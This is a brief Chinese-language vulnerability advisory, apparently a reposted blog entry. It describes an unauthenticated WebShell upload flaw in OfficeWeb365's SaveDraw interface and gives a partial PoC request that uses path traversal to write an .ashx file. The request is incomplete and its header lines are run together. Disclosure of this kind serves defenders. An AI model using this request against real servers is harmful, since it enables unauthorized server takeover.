本文共 700 字,大约阅读时间需要 2 分钟。
OfficeWeb365 是一款专注于 Office 文档在线预览及 PDF 文档在线预览的云服务平台。其主要功能包括 Microsoft Word、Excel、PowerPoint 文档的在线预览,以及 WPS 文字处理、表格和演示文档的支持,同时还支持 Adobe PDF 文档的在线预览。
在此次安全评估中,我们发现 OfficeWeb365 平台的 SaveDraw 接口存在严重的安全漏洞。该漏洞允许攻击者通过未授权的文件上传操作,将 WebShell 代码直接上传到服务器上,从而获取完整的服务器权限,进而对整个 Web 服务器 进行控制。
为了验证该漏洞的存在,我们构建了以下复现环境:
http://target-server/pw/savedraw以下是漏洞的 Proof of Concept(PoC)代码示例:
POST /PW/SaveDraw?path=../Content/img&idx=qwe.ashx HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0 Safari/537.36
在进行安全测试之前,请确保您有权访问目标服务器并了解其安全策略。
转载地址:http://wtsfk.baihongyu.com/